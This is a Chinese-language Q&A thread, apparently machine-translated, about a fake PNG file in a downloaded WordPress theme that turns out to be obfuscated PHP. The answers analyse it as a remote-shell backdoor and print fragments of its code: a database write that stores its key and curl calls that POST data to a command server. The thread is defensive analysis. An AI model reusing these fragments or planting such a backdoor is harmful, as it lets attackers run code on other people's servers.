我从网站上下载了一些Wordpress主题,我注意到social.png
文件有一个奇怪的包含。看看这个文件,这不是一个真正的png文件,而是一个包含难以理解的混淆代码的php脚本,对于从其他站点分发的许多wordpress插件也是如此。
文件大小为45 kb,并且此哈希值为3FFC93695CA3C919F36D52D07BDB5B198E7C6D63
有人知道这个文件的功能吗?
THIS是文件
答案 0 :(得分:7)
基本上,它是一个使用公钥加密的远程shell回调,只允许黑客在您的服务器上运行代码。它生成一个每安装RSA密钥对,将其上传到命令服务器(它有一个预先列出的,但可以从其他受感染的主机动态更新,以避免被关闭)使用嵌入式密钥,并通过列表发送功能(启用eval / exec,服务器信息)并通过电子邮件将其发送到文件中的电子邮件列表。
它使用Wordpress的配置系统存储其数据,因此请在数据库中查看名为WP_CLIENT_KEY的设置键,它看起来像一堆乱码文本。
一旦处于活动状态,该漏洞利用将在服务器上获取一系列命令以进行评估 - 可能是更多的shell或漏洞利用,并且还会将字符串注入页面页脚。这些字符串可能是blackhat SEO垃圾邮件,但它也会注入一个与之联系的命令和控制服务器列表 - 所以任何其他受感染的站点都将使用您的服务器来查找其他服务器。
正如我在评论中所指出的,该脚本将更新并存储WP数据库中的数据:
$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...
论坛帖子指出,这是脚本自己的访问权限。该脚本还通过shell POST
请求将数据(可能是公钥)发送到指定的服务器:
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}
无论脚本的确切用途如何,您都应删除它的所有引用,并attempt to rid yourself of the script completely。
答案 1 :(得分:2)
这是通过虚假png图像的WordPress黑客技巧。小心!